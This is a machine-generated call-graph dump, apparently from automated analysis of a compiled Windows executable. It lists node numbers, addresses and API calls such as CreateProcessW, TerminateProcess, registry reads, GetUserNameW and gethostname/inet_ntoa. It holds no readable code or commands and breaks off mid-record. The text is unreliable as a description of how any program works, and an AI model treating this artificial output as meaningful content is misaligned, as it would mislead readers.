48 API calls 104952->104954 104953->104948 104955 4024de 104954->104955 104956 4025a1 104955->104956 104957 4024e8 104955->104957 104958 4025d3 GetCurrentDirectoryW 104956->104958 104960 3a84a6 81 API calls 104956->104960 104959 3a84a6 81 API calls 104957->104959 104961 3c010a 48 API calls 104958->104961 104962 4024f9 104959->104962 104963 4025b8 104960->104963 104964 4025f8 GetCurrentDirectoryW 104961->104964 104965 3a3bcf 48 API calls 104962->104965 104966 3a3bcf 48 API calls 104963->104966 104967 402605 104964->104967 104968 402503 104965->104968 104969 4025c2 __NMSG_WRITE 104966->104969 104972 3aca8e 48 API calls 104967->104972 104978 40263e 104967->104978 104970 3a84a6 81 API calls 104968->104970 104969->104958 104969->104978 104971 402514 104970->104971 104973 3a3bcf 48 API calls 104971->104973 104974 40261e 104972->104974 104975 40251e 104973->104975 104976 3aca8e 48 API calls 104974->104976 104977 3a84a6 81 API calls 104975->104977 104980 40262e 104976->104980 104981 40252f 104977->104981 104979 40268a 104978->104979 105017 3ea17a 8 API calls 104978->105017 104983 4026c1 104979->104983 104984 40274c CreateProcessW 104979->104984 104985 3aca8e 48 API calls 104980->104985 104986 3a3bcf 48 API calls 104981->104986 105020 3dbc90 69 API calls 104983->105020 104997 40276b 104984->104997 104985->104978 104989 402539 104986->104989 104987 402655 105018 3ea073 8 API calls 104987->105018 104991 40256f GetSystemDirectoryW 104989->104991 104993 3a84a6 81 API calls 104989->104993 104995 3c010a 48 API calls 104991->104995 104992 402670 105019 3ea102 8 API calls 104992->105019 104996 402550 104993->104996 104998 402594 GetSystemDirectoryW 104995->104998 104999 3a3bcf 48 API calls 104996->104999 105001 402780 104997->105001 105002 4027bd CloseHandle 104997->105002 104998->104967 105000 40255a __NMSG_WRITE 104999->105000 105000->104967 105000->104991 105006 402791 GetLastError 105001->105006 105003 4027cb 105002->105003 105011 4027f5 105002->105011 105021 3e9d09 CloseHandle Mailbox 105003->105021 105005 4027fb 105008 4027a5 105005->105008 105006->105008 105022 3e9b29 CloseHandle 105008->105022 105011->105005 105014 402827 CloseHandle 105011->105014 105012 401f2b 105012->103184 105014->105008 105016 4026df __NMSG_WRITE 105016->104997 105017->104987 105018->104992 105019->104979 105020->105016 105022->105012 105023->103450 105024->103463 105025->103470 105026->103462 105028 3a84a6 81 API calls 105027->105028 105029 3ff7db 105028->105029 105051 3ff81d Mailbox 105029->105051 105063 400458 105029->105063 105031 3ffa7c 105032 3ffbeb 105031->105032 105036 3ffa86 105031->105036 105109 400579 89 API calls Mailbox 105032->105109 105035 3ffbf8 105035->105036 105037 3ffc04 105035->105037 105076 3ff5fb 105036->105076 105037->105051 105038 3a84a6 81 API calls 105048 3ff875 Mailbox 105038->105048 105043 3ffaba 105090 3bf92c 105043->105090 105046 3ffaee 105097 3a3320 105046->105097 105047 3ffad4 105096 3ed520 86 API calls 4 library calls 105047->105096 105048->105031 105048->105038 105048->105051 105094 4028d9 48 API calls _memmove 105048->105094 105095 3ffc96 60 API calls 2 library calls 105048->105095 105051->103482 105052 3ffb05 105054 3b14a0 48 API calls 105052->105054 105061 3ffb2f 105052->105061 105053 3ffadf GetCurrentProcess TerminateProcess 105053->105046 105055 3ffb1e 105054->105055 105108 400300 105 API calls _free 105055->105108 105057 3b14a0 48 API calls 105057->105061 105058 3ffc56 105058->105051 105059 3ffc6f FreeLibrary 105058->105059 105059->105051 105061->105057 105061->105058 105062 3ad89e 50 API calls 105061->105062 105110 400300 105 API calls _free 105061->105110 105062->105061 105064 3ab8a7 48 API calls 105063->105064 105065 400473 CharLowerBuffW 105064->105065 105066 3f267a 60 API calls 105065->105066 105067 400494 105066->105067 105069 3ad3d2 48 API calls 105067->105069 105074 4004cf Mailbox 105067->105074 105070 4004ac 105069->105070 105071 3a7f40 48 API calls 105070->105071 105072 4004c3 105071->105072 105073 3aa2fb 48 API calls 105072->105073 105073->105074 105075 40050b Mailbox 105074->105075 105111 3ffc96 60 API calls 2 library calls 105074->105111 105075->105048 105077 3ff616 105076->105077 105081 3ff66b 105076->105081 105078 3c010a 48 API calls 105077->105078 105079 3ff638 105078->105079 105080 3c010a 48 API calls 105079->105080 105079->105081 105080->105079 105082 400719 105081->105082 105083 400944 Mailbox 105082->105083 105089 40073c _strcat _wcscpy __NMSG_WRITE 105082->105089 105083->105043 105084 3ad00b 58 API calls 105084->105089 105085 3acdb4 48 API calls 105085->105089 105086 3a84a6 81 API calls 105086->105089 105087 3c45ec 47 API calls __crtGetStringTypeA_stat 105087->105089 105089->105083 105089->105084 105089->105085 105089->105086 105089->105087 105112 3e8932 50 API calls __NMSG_WRITE 105089->105112 105092 3bf941 105090->105092 105091 3bf9d9 select 105093 3bf9a7 105091->105093 105092->105091 105092->105093 105093->105046 105093->105047 105094->105048 105095->105048 105096->105053 105098 3a3334 105097->105098 105100 3a3339 Mailbox 105097->105100 105113 3a342c 48 API calls 105098->105113 105106 3a3347 105100->105106 105114 3a346e 48 API calls 105100->105114 105102 3c010a 48 API calls 105104 3a33d8 105102->105104 105103 3a3422 105103->105052 105105 3c010a 48 API calls 105104->105105 105107 3a33e3 105105->105107 105106->105102 105106->105103 105107->105052 105108->105061 105109->105035 105110->105061 105111->105075 105112->105089 105113->105100 105114->105106 105123 3fae3b 105115->105123 105118 3fad05 Mailbox 105119 3fad31 htons 105118->105119 105120 3fad1b 105118->105120 105119->105120 105120->103489 105122 3ed7f2 105121->105122 105122->103496 105124 3aa6d4 48 API calls 105123->105124 105125 3fae49 105124->105125 105128 3fae79 WideCharToMultiByte 105125->105128 105127 3facf3 inet_addr 105127->105118 105129 3fae9d 105128->105129 105130 3faea7 105128->105130 105131 3bf324 48 API calls 105129->105131 105132 3c010a 48 API calls 105130->105132 105135 3faea5 105131->105135 105133 3faeae WideCharToMultiByte 105132->105133 105134 3bf2d0 48 API calls 105133->105134 105134->105135 105135->105127 105136->103501 105137->103544 105139 3f6b25 GetWindowRect 105138->105139 105140 3f6b42 105138->105140 105141 3f6b5c 105139->105141 105140->105141 105142 3f6b52 ClientToScreen 105140->105142 105141->103560 105141->103563 105142->105141 105143->103566 105144->103570 105146 3bdd89 105145->105146 105147 414a7d FindFirstFileW 105145->105147 105146->103184 105148 414a95 FindClose 105147->105148 105149 414a8e 105147->105149 105149->105148 105150->103587 105151->103589 105153 3ac4cd 48 API calls 105152->105153 105154 3de2fe 105153->105154 105168 3a193b SendMessageTimeoutW 105154->105168 105156 3de305 105157 3de309 Mailbox 105156->105157 105169 3de390 105156->105169 105157->103608 105160 3c010a 48 API calls 105161 3de338 _strlen 105160->105161 105161->105157 105162 3de378 105161->105162 105163 3de35a 105161->105163 105164 3a7e53 48 API calls 105162->105164 105172 3de0f5 48 API calls 2 library calls 105163->105172 105164->105157 105166 3de362 105167 3ac610 50 API calls 105166->105167 105167->105157 105168->105156 105173 3a193b SendMessageTimeoutW 105169->105173 105171 3de314 105171->105160 105172->105166 105173->105171 105175 3aa9af 105174->105175 105178 3aa9ca 105174->105178 105176 3ab8a7 48 API calls 105175->105176 105177 3aa9b7 CharUpperBuffW 105176->105177 105177->105178 105178->103622 105180 3a10f9 105179->105180 105181 414c5a 105179->105181 105182 3c010a 48 API calls 105180->105182 105183 3a1100 105182->105183 105184 3a1121 105183->105184 105213 3a113c 48 API calls 105183->105213 105184->103646 105186->103629 105187->103680 105188->103680 105189->103680 105190->103689 105191->103629 105193 3ad30a 105192->105193 105194 3ad2df 105192->105194 105193->103643 105193->103644 105197 3ad2e6 105194->105197 105215 3ad349 53 API calls 105194->105215 105197->105193 105214 3ad349 53 API calls 105197->105214 105198->103682 105199->103673 105200->103673 105201->103678 105202->103682 105203->103656 105204->103682 105205->103682 105206->103682 105207->103680 105208->103680 105209->103680 105210->103682 105211->103677 105212->103682 105213->105184 105214->105193 105215->105197 105216->103699 105217 41bc25 105218 41bc27 105217->105218 105221 3e79f8 SHGetFolderPathW 105218->105221 105220 41bc30 105220->105220 105222 3a7e53 48 API calls 105221->105222 105223 3e7a25 105222->105223 105223->105220 105224 41c146 GetUserNameW 105225 411e8b 105230 3be44f 105225->105230 105229 411e9a 105231 3c010a 48 API calls 105230->105231 105232 3be457 105231->105232 105234 3be46b 105232->105234 105238 3be74b 105232->105238 105237 3c1b2a 52 API calls __cinit 105234->105237 105237->105229 105239 3be754 105238->105239 105241 3be463 105238->105241 105270 3c1b2a 52 API calls __cinit 105239->105270 105242 3be47b 105241->105242 105243 3ad3d2 48 API calls 105242->105243 105244 3be492 GetVersionExW 105243->105244 105245 3a7e53 48 API calls 105244->105245 105246 3be4d5 105245->105246 105271 3be5f8 105246->105271 105249 3be617 48 API calls 105253 3be4e9 105249->105253 105251 4129f9 105253->105251 105275 3be6d1 105253->105275 105254 3be55f GetCurrentProcess 105284 3be70e LoadLibraryA GetProcAddress 105254->105284 105255 3be576 105256 3be59e 105255->105256 105257 3be5ec GetSystemInfo 105255->105257 105278 3be694 105256->105278 105260 3be5c9 105257->105260 105262 3be5dc 105260->105262 105263 3be5d7 FreeLibrary 105260->105263 105262->105234 105263->105262 105264 3be5e4 GetSystemInfo 105267 3be5be 105264->105267 105265 3be5b4 105281 3be437 105265->105281 105267->105260 105269 3be5c4 FreeLibrary 105267->105269 105269->105260 105270->105241 105272 3be601 105271->105272 105273 3aa2fb 48 API calls 105272->105273 105274 3be4dd 105273->105274 105274->105249 105285 3be6e3 105275->105285 105289 3be6a6 105278->105289 105282 3be694 2 API calls 105281->105282 105283 3be43f GetNativeSystemInfo 105282->105283 105283->105267 105284->105255 105286 3be55b 105285->105286 105287 3be6ec LoadLibraryA 105285->105287 105286->105254 105286->105255 105287->105286 105288 3be6fd GetProcAddress 105287->105288 105288->105286 105290 3be5ac 105289->105290 105291 3be6af LoadLibraryA 105289->105291 105290->105264 105290->105265 105291->105290 105292 3be6c0 GetProcAddress 105291->105292 105292->105290 105293 411eca 105298 3bbe17 105293->105298 105297 411ed9 105299 3ad3d2 48 API calls 105298->105299 105300 3bbe85 105299->105300 105306 3bc929 105300->105306 105302 3bbf22 105303 3bbf3e 105302->105303 105309 3bc8b7 48 API calls _memmove 105302->105309 105305 3c1b2a 52 API calls __cinit 105303->105305 105305->105297 105310 3bc955 105306->105310 105309->105302 105311 3bc948 105310->105311 105312 3bc962 105310->105312 105311->105302 105312->105311 105313 3bc969 RegOpenKeyExW 105312->105313 105313->105311 105314 3bc983 RegQueryValueExW 105313->105314 105315 3bc9b9 RegCloseKey 105314->105315 105316 3bc9a4 105314->105316 105315->105311 105316->105315 105317 411eed 105322 3be975 105317->105322 105319 411f01 105338 3c1b2a 52 API calls __cinit 105319->105338 105321 411f0b 105323 3c010a 48 API calls 105322->105323 105324 3bea27 GetModuleFileNameW 105323->105324 105325 3c297d __wsplitpath 47 API calls 105324->105325 105326 3bea5b _wcsncat 105325->105326 105339 3c2bff 105326->105339 105329 3c010a 48 API calls 105330 3bea94 _wcscpy 105329->105330 105331 3ad3d2 48 API calls 105330->105331 105332 3beacf 105331->105332 105342 3beb05 105332->105342 105334 3beae0 Mailbox 105334->105319 105335 3aa4f6 48 API calls 105337 3beada _wcscat __NMSG_WRITE _wcsncpy 105335->105337 105336 3c010a 48 API calls 105336->105337 105337->105334 105337->105335 105337->105336 105338->105321 105356 3caab9 105339->105356 105343 3ac4cd 48 API calls 105342->105343 105344 3beb14 RegOpenKeyExW 105343->105344 105345 414b17 RegQueryValueExW 105344->105345 105346 3beb35 105344->105346 105347 414b91 RegCloseKey 105345->105347 105348 414b30 105345->105348 105346->105337 105349 3c010a 48 API calls 105348->105349 105350 414b49 105349->105350 105351 3a4bce 48 API calls 105350->105351 105352 414b53 RegQueryValueExW 105351->105352 105353 414b86 105352->105353 105354 414b6f 105352->105354 105353->105347 105355 3a7e53 48 API calls 105354->105355 105355->105353 105357 3caaca 105356->105357 105358 3cabc6 105356->105358 105357->105358 105364 3caad5 105357->105364 105366 3c889e 47 API calls __getptd_noexit 105358->105366 105362 3bea8a 105362->105329 105363 3cabbb 105367 3c7aa0 8 API calls __woutput_l 105363->105367 105364->105362 105365 3c889e 47 API calls __getptd_noexit 105364->105365 105365->105363 105366->105363 105367->105362 105368 3b0ff7 105369 3be016 50 API calls 105368->105369 105370 3b100d 105369->105370 105424 3be08f 105370->105424 105375 3b105e 105382 3ac935 48 API calls 105375->105382 105376 3b0dee 105383 3ad89e 50 API calls 105376->105383 105378 3b1063 105444 3ed520 86 API calls 4 library calls 105378->105444 105379 3b0dfa 105386 3ad89e 50 API calls 105379->105386 105380 41b772 105446 3ed520 86 API calls 4 library calls 105380->105446 105381 3b0119 105445 3ed520 86 API calls 4 library calls 105381->105445 105397 3afbf1 Mailbox 105382->105397 105383->105379 105384 3af6d0 413 API calls 105399 3afad8 Mailbox _memmove 105384->105399 105385 3ac935 48 API calls 105385->105399 105387 3b0e83 105386->105387 105392 3acaee 48 API calls 105387->105392 105388 3ad3d2 48 API calls 105388->105399 105390 41b7d2 105391 3c1b2a 52 API calls __cinit 105391->105399 105402 3b10f1 Mailbox 105392->105402 105395 3b103d 105395->105397 105443 3ed520 86 API calls 4 library calls 105395->105443 105398 3c010a 48 API calls 105398->105399 105399->105375 105399->105376 105399->105378 105399->105379 105399->105380 105399->105381 105399->105384 105399->105385 105399->105387 105399->105388 105399->105391 105399->105395 105399->105397 105399->105398 105400 3afa40 413 API calls 105399->105400 105399->105402 105404 3da599 InterlockedDecrement 105399->105404 105405 41b583 105399->105405 105407 3f013f 87 API calls 105399->105407 105408 4010e5 82 API calls 105399->105408 105409 3bf03e 2 API calls 105399->105409 105410 4017aa 87 API calls 105399->105410 105411 4030ad 93 API calls 105399->105411 105412 40798d 109 API calls 105399->105412 105413 40804e 111 API calls 105399->105413 105414 3fb74b 413 API calls 105399->105414 105415 3bef0d 94 API calls 105399->105415 105416 3a50a3 49 API calls 105399->105416 105417 401f19 132 API calls 105399->105417 105418 400bfa 129 API calls 105399->105418 105419 3bf461 98 API calls 105399->105419 105420 3f8065 55 API calls 105399->105420 105421 3f9122 91 API calls 105399->105421 105422 3f92c0 88 API calls 105399->105422 105423 3bdd84 3 API calls 105399->105423 105436 3b1620 59 API calls Mailbox 105399->105436 105437 3fee52 82 API calls 2 library calls 105399->105437 105438 3fef9d 90 API calls Mailbox 105399->105438 105439 3eb020 48 API calls 105399->105439 105440 3fe713 413 API calls Mailbox 105399->105440 105400->105399 105442 3ed520 86 API calls 4 library calls 105402->105442 105404->105399 105441 3ed520 86 API calls 4 library calls 105405->105441 105407->105399 105408->105399 105409->105399 105410->105399 105411->105399 105412->105399 105413->105399 105414->105399 105415->105399 105416->105399 105417->105399 105418->105399 105419->105399 105420->105399 105421->105399 105422->105399 105423->105399 105447 3a7b6e 48 API calls 105424->105447 105426 3be0b4 _wcscmp 105427 3acaee 48 API calls 105426->105427 105429 3be0e2 Mailbox 105426->105429 105428 41b9c7 105427->105428 105448 3a7b4b 48 API calls Mailbox 105428->105448 105429->105399 105431 41b9d5 105432 3ad2d2 53 API calls 105431->105432 105433 41b9e7 105432->105433 105434 41b9ec Mailbox 105433->105434 105435 3ad89e 50 API calls 105433->105435 105434->105399 105435->105434 105436->105399 105437->105399 105438->105399 105439->105399 105440->105399 105441->105402 105442->105397 105443->105378 105444->105381 105445->105380 105446->105390 105447->105426 105448->105431 105449 3ae849 105452 3b26c0 105449->105452 105451 3ae852 105453 3b273b 105452->105453 105454 41862d 105452->105454 105459 3b2adc 105453->105459 105460 3b277c 105453->105460 105466 3b279a 105453->105466 105574 3ed520 86 API calls 4 library calls 105454->105574 105456 41863e 105575 3ed520 86 API calls 4 library calls 105456->105575 105457 3b27cf 105457->105456 105462 3b27db 105457->105462 105458 3b2a84 105469 3ad380 55 API calls 105458->105469 105573 3ad349 53 API calls 105459->105573 105496 3b28f6 105460->105496 105569 3ad500 53 API calls __cinit 105460->105569 105464 3b27ef 105462->105464 105478 41865a 105462->105478 105467 3b2806 105464->105467 105468 4186c9 105464->105468 105466->105457 105466->105458 105484 3b2914 105466->105484 105470 3afa40 413 API calls 105467->105470 105472 418ac9 105468->105472 105475 3afa40 413 API calls 105468->105475 105471 3b2aab 105469->105471 105506 3b281d 105470->105506 105474 3ad2d2 53 API calls 105471->105474 105590 3ed520 86 API calls 4 library calls 105472->105590 105474->105484 105476 4186ee 105475->105476 105480 3ad89e 50 API calls 105476->105480 105489 41870a 105476->105489 105491 3b29ec 105476->105491 105478->105468 105478->105491 105576 3ff211 413 API calls 105478->105576 105577 3ff4df 413 API calls 105478->105577 105479 418980 105585 3ed520 86 API calls 4 library calls 105479->105585 105480->105489 105481 3acdb4 48 API calls 105492 3b296e 105481->105492 105484->105481 105485 3b2836 105485->105472 105486 3afa40 413 API calls 105485->105486 105510 3b287c 105486->105510 105487 3ac935 48 API calls 105487->105485 105488 3b28cc 105488->105496 105570 3acf97 58 API calls 105488->105570 105494 41878d 105489->105494 105578 3a346e 48 API calls 105489->105578 105491->105451 105492->105491 105499 3b2984 105492->105499 105513 4189b4 105492->105513 105525 418a97 105492->105525 105493 3b28ac 105493->105488 105583 3acf97 58 API calls 105493->105583 105495 41883f 105494->105495 105540 41882d 105494->105540 105579 3e4e71 53 API calls __cinit 105494->105579 105581 3fc235 413 API calls Mailbox 105495->105581 105503 3b2900 105496->105503 105584 3acf97 58 API calls 105496->105584 105499->105525 105571 3b41fc 84 API calls 105499->105571 105501 418888 105501->105506 105507 41888c 105501->105507 105503->105479 105503->105484 105504 418725 105530 3b14a0 48 API calls 105504->105530 105504->105540 105505 3aca8e 48 API calls 105505->105495 105506->105485 105506->105487 105506->105491 105582 3ed520 86 API calls 4 library calls 105507->105582 105508 4187ca 105519 418813 105508->105519 105524 3a84a6 81 API calls 105508->105524 105510->105491 105510->105493 105515 3afa40 413 API calls 105510->105515 105555 3fbf80 105513->105555 105521 4188ff 105515->105521 105516 3b29b8 105517 418a7e 105516->105517 105572 3b41fc 84 API calls 105516->105572 105588 3bee93 84 API calls 105517->105588 105527 3ad89e 50 API calls 105519->105527 105521->105491 105528 3ad89e 50 API calls 105521->105528 105523 4189f3 105535 418a01 105523->105535 105536 418a42 105523->105536 105543 4187e0 105524->105543 105525->105491 105589 3a4b02 50 API calls 105525->105589 105526 3b29ca 105526->105491 105531 418a6f 105526->105531 105532 3b29e5 105526->105532 105529 418821 105527->105529 105528->105493 105533 3ad89e 50 API calls 105529->105533 105534 41875d 105530->105534 105587 3fd1da 50 API calls 105531->105587 105539 3c010a 48 API calls 105532->105539 105533->105540 105534->105540 105544 3b14a0 48 API calls 105534->105544 105541 3aca8e 48 API calls 105535->105541 105537 3ad89e 50 API calls 105536->105537 105542 418a4b 105537->105542 105539->105491 105540->105505 105541->105491 105545 3ad89e 50 API calls 105542->105545 105543->105519 105580 3ea76d 49 API calls 105543->105580 105547 418775 105544->105547 105548 418a57 105545->105548 105550 3ad89e 50 API calls 105547->105550 105586 3a4b02 50 API calls 105548->105586 105549 418807 105552 3ad89e 50 API calls 105549->105552 105553 418781 105550->105553 105552->105519 105554 3ad89e 50 API calls 105553->105554 105554->105494 105561 3fbfd9 _memset 105555->105561 105556 3fc033 105593 3fc235 413 API calls Mailbox 105556->105593 105558 3fc22e 105558->105523 105559 3fc14c 105559->105556 105560 3fc19f VariantInit VariantClear 105559->105560 105562 3fc1c5 105560->105562 105561->105556 105561->105559 105563 3fc097 VariantInit 105561->105563 105562->105556 105564 3fc1e6 105562->105564 105567 3fc0d6 105563->105567 105592 3ea6f6 103 API calls 105564->105592 105566 3fc20d VariantClear 105566->105558 105567->105556 105591 3ea6f6 103 API calls 105567->105591 105569->105466 105570->105496 105571->105516 105572->105526 105573->105493 105574->105456 105575->105478 105576->105478 105577->105478 105578->105504 105579->105508 105580->105549 105581->105501 105582->105491 105583->105488 105584->105503 105585->105491 105586->105491 105587->105517 105588->105525 105589->105472 105590->105491 105591->105559 105592->105566 105593->105558 105594 3a29c2 105595 3a29cb 105594->105595 105596 3a2a48 105595->105596 105597 3a29e9 105595->105597 105598 3a2a46 105595->105598 105602 3a2a4e 105596->105602 105603 412307 105596->105603 105599 3a2aac PostQuitMessage 105597->105599 105600 3a29f6 105597->105600 105601 3a2a2b NtdllDefWindowProc_W 105598->105601 105607 3a2a39 105599->105607 105605 3a2a01 105600->105605 105606 41238f 105600->105606 105601->105607 105608 3a2a53 105602->105608 105609 3a2a76 SetTimer RegisterClipboardFormatW 105602->105609 105649 3a322e 16 API calls 105603->105649 105613 3a2a09 105605->105613 105614 3a2ab6 105605->105614 105655 3e57fb 60 API calls _memset 105606->105655 105610 3a2a5a KillTimer 105608->105610 105611 4122aa 105608->105611 105609->105607 105615 3a2a9f CreatePopupMenu 105609->105615 105646 3a2b94 Shell_NotifyIconW _memset 105610->105646 105623 4122e3 MoveWindow 105611->105623 105624 4122af 105611->105624 105612 41232e 105650 3bec33 413 API calls Mailbox 105612->105650 105619 412374 105613->105619 105620 3a2a14 105613->105620 105639 3a1e58 105614->105639 105615->105607 105619->105601 105654 3db31f 48 API calls 105619->105654 105626 3a2a1f 105620->105626 105627 41235f 105620->105627 105621 4123a1 105621->105601 105621->105607 105623->105607 105628 4122b3 105624->105628 105629 4122d2 SetFocus 105624->105629 105625 3a2a6d 105647 3a2ac7 DeleteObject DestroyWindow Mailbox 105625->105647 105626->105601 105651 3a2b94 Shell_NotifyIconW _memset 105626->105651 105653 3e5fdb 70 API calls _memset 105627->105653 105628->105626 105633 4122bc 105628->105633 105629->105607 105648 3a322e 16 API calls 105633->105648 105634 41236f 105634->105607 105637 412353 105652 3a3598 67 API calls _memset 105637->105652 105640 3a1e6f _memset 105639->105640 105641 3a1ef1 105639->105641 105656 3a38e4 105640->105656 105641->105607 105643 3a1eda KillTimer SetTimer 105643->105641 105644 414518 Shell_NotifyIconW 105644->105643 105645 3a1e96 105645->105643 105645->105644 105646->105625 105647->105607 105648->105607 105649->105612 105650->105626 105651->105637 105652->105598 105653->105634 105654->105598 105655->105621 105657 3a3900 105656->105657 105677 3a39d5 Mailbox 105656->105677 105678 3a7b6e 48 API calls 105657->105678 105659 3a390e 105660 3a391b 105659->105660 105661 41453f LoadStringW 105659->105661 105662 3a7e53 48 API calls 105660->105662 105664 414559 105661->105664 105663 3a3930 105662->105663 105663->105664 105665 3a3941 105663->105665 105680 3a39e8 48 API calls 2 library calls 105664->105680 105667 3a39da 105665->105667 105668 3a394b 105665->105668 105670 3ac935 48 API calls 105667->105670 105679 3a39e8 48 API calls 2 library calls 105668->105679 105669 414564 105672 414578 105669->105672 105675 3a3956 _memset _wcscpy 105669->105675 105670->105675 105681 3a39e8 48 API calls 2 library calls 105672->105681 105674 414586 105676 3a39ba Shell_NotifyIconW 105675->105676 105676->105677 105677->105645 105678->105659 105679->105675 105680->105669 105681->105674 105682 41c05b 105683 41c05d 105682->105683 105686 3e78ee WSAStartup 105683->105686 105685 41c066 105687 3e7917 gethostname gethostbyname 105686->105687 105689 3e79b1 _wcscpy 105686->105689 105687->105689 105690 3e793a _memmove 105687->105690 105688 3e7952 _wcscpy 105692 3e79a9 WSACleanup 105688->105692 105689->105685 105690->105688 105691 3e7970 inet_ntoa 105690->105691 105693 3e7989 _strcat 105691->105693 105692->105689 105695 3e8553 105693->105695 105696 3e8565 _strlen 105695->105696 105699 3e8561 105695->105699 105697 3e8574 MultiByteToWideChar 105696->105697 105698 3e858a 105697->105698 105697->105699 105700 3c010a 48 API calls 105698->105700 105699->105688 105701 3e85a6 MultiByteToWideChar 105700->105701 105701->105699 105702 411edb 105707 3a131c 105702->105707 105708 3a133e 105707->105708 105741 3a1624 105708->105741 105713 3ad3d2 48 API calls 105714 3a137e 105713->105714 105715 3ad3d2 48 API calls 105714->105715 105716 3a1388 105715->105716 105717 3ad3d2 48 API calls 105716->105717 105718 3a1392 105717->105718 105719 3ad3d2 48 API calls 105718->105719 105720 3a13d8 105719->105720 105721 3ad3d2 48 API calls 105720->105721 105722 3a14bb 105721->105722 105749 3a1673 105722->105749 105787 3a17e0 105741->105787 105744 3a7e53 48 API calls 105745 3a1344 105744->105745 105746 3a16db 105745->105746 105801 3a1867 6 API calls 105746->105801 105748 3a1374 105748->105713 105750 3ad3d2 48 API calls 105749->105750 105751 3a1683 105750->105751 105752 3ad3d2 48 API calls 105751->105752 105753 3a168b 105752->105753 105802 3a7d70 105753->105802 105756 3a7d70 48 API calls 105757 3a169b 105756->105757 105758 3ad3d2 48 API calls 105757->105758 105759 3a16a6 105758->105759 105760 3c010a 48 API calls 105759->105760 105794 3a17fc 105787->105794 105790 3a17fc 48 API calls 105791 3a17f0 105790->105791 105792 3ad3d2 48 API calls 105791->105792 105793 3a165b 105792->105793 105793->105744 105795 3ad3d2 48 API calls 105794->105795 105796 3a1807 105795->105796 105797 3ad3d2 48 API calls 105796->105797 105798 3a180f 105797->105798 105799 3ad3d2 48 API calls 105798->105799 105800 3a17e8 105799->105800 105800->105790 105801->105748 105803 3ad3d2 48 API calls 105802->105803 105804 3a7d79 105803->105804 105805 3ad3d2 48 API calls 105804->105805 105806 3a1693 105805->105806 105806->105756 105809 3c6a80 105810 3c6a8c __getstream 105809->105810 105846 3c8b7b GetStartupInfoW 105810->105846 105813 3c6a91 105848 3ca937 GetProcessHeap 105813->105848 105814 3c6ae9 105815 3c6af4 105814->105815 105933 3c6bd0 47 API calls 3 library calls 105814->105933 105849 3c87d7 105815->105849 105818 3c6afa 105819 3c6b05 __RTC_Initialize 105818->105819 105934 3c6bd0 47 API calls 3 library calls 105818->105934 105870 3cba66 105819->105870 105822 3c6b14 105823 3c6b20 GetCommandLineW 105822->105823 105935 3c6bd0 47 API calls 3 library calls 105822->105935 105889 3d3c2d GetEnvironmentStringsW 105823->105889 105826 3c6b1f 105826->105823 105830 3c6b45 105902 3d3a64 105830->105902 105833 3c6b4b 105834 3c6b56 105833->105834 105937 3c1d7b 47 API calls 3 library calls 105833->105937 105916 3c1db5 105834->105916 105837 3c6b5e 105838 3c6b69 __wwincmdln 105837->105838 105938 3c1d7b 47 API calls 3 library calls 105837->105938 105920 3a3682 105838->105920 105847 3c8b91 105846->105847 105847->105813 105848->105814 105941 3c1e5a 30 API calls 2 library calls 105849->105941 105851 3c87dc 105942 3c8ab3 InitializeCriticalSectionAndSpinCount 105851->105942 105853 3c87e1 105854 3c87e5 105853->105854 105944 3c8afd TlsAlloc 105853->105944 105943 3c884d 50 API calls 2 library calls 105854->105943 105857 3c87f7 105857->105854 105859 3c8802 105857->105859 105858 3c87ea 105858->105818 105945 3c7616 105859->105945 105862 3c8844 105953 3c884d 50 API calls 2 library calls 105862->105953 105865 3c8823 105865->105862 105867 3c8829 105865->105867 105866 3c8849 105866->105818 105952 3c8724 47 API calls 4 library calls 105867->105952 105869 3c8831 GetCurrentThreadId 105869->105818 105871 3cba72 __getstream 105870->105871 105962 3c8984 105871->105962 105873 3cba79 105874 3c7616 __calloc_crt 47 API calls 105873->105874 105875 3cba8a 105874->105875 105876 3cbaf5 GetStartupInfoW 105875->105876 105877 3cba95 @_EH4_CallFilterFunc@8 __getstream 105875->105877 105878 3cbc33 105876->105878 105881 3cbb0a 105876->105881 105877->105822 105879 3cbcf7 105878->105879 105882 3cbc7c GetStdHandle 105878->105882 105884 3cbc8e GetFileType 105878->105884 105886 3cbcbb InitializeCriticalSectionAndSpinCount 105878->105886 105969 3cbd0b RtlLeaveCriticalSection _doexit 105879->105969 105881->105878 105883 3c7616 __calloc_crt 47 API calls 105881->105883 105885 3cbb58 105881->105885 105882->105878 105883->105881 105884->105878 105885->105878 105887 3cbb98 InitializeCriticalSectionAndSpinCount 105885->105887 105888 3cbb8a GetFileType 105885->105888 105886->105878 105887->105885 105888->105885 105888->105887 105890 3d3c3e 105889->105890 105891 3c6b30 105889->105891 106008 3c7660 47 API calls __crtGetStringTypeA_stat 105890->106008 105896 3d382b GetModuleFileNameW 105891->105896 105894 3d3c64 _memmove 105895 3d3c7a FreeEnvironmentStringsW 105894->105895 105895->105891 105897 3d385f _wparse_cmdline 105896->105897 105898 3c6b3a 105897->105898 105899 3d3899 105897->105899 105898->105830 105936 3c1d7b 47 API calls 3 library calls 105898->105936 106009 3c7660 47 API calls __crtGetStringTypeA_stat 105899->106009 105901 3d389f _wparse_cmdline 105901->105898 105903 3d3a75 105902->105903 105904 3d3a7d __NMSG_WRITE 105902->105904 105903->105833 105905 3c7616 __calloc_crt 47 API calls 105904->105905 105906 3d3aa6 __NMSG_WRITE 105905->105906 105906->105903 105908 3c7616 __calloc_crt 47 API calls 105906->105908 105909 3d3afd 105906->105909 105910 3d3b22 105906->105910 105913 3d3b39 105906->105913 106010 3d3317 47 API calls __woutput_l 105906->106010 105907 3c28ca _free 47 API calls 105907->105903 105908->105906 105909->105907 105911 3c28ca _free 47 API calls 105910->105911 105911->105903 106011 3c7ab0 IsProcessorFeaturePresent 105913->106011 105917 3c1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 105916->105917 105919 3c1e00 __IsNonwritableInCurrentImage 105917->105919 106034 3c1b2a 52 API calls __cinit 105917->106034 105919->105837 105921 4123b5 105920->105921 105922 3a369c 105920->105922 105923 3a36d6 74BFC8D0 105922->105923 105933->105815 105934->105819 105935->105826 105941->105851 105942->105853 105943->105858 105944->105857 105948 3c761d 105945->105948 105947 3c765a 105947->105862 105951 3c8b59 TlsSetValue 105947->105951 105948->105947 105949 3c763b Sleep 105948->105949 105954 3d3e5a 105948->105954 105950 3c7652 105949->105950 105950->105947 105950->105948 105951->105865 105952->105869 105953->105866 105955 3d3e65 105954->105955 105959 3d3e80 __calloc_impl 105954->105959 105956 3d3e71 105955->105956 105955->105959 105961 3c889e 47 API calls __getptd_noexit 105956->105961 105957 3d3e90 RtlAllocateHeap 105957->105959 105960 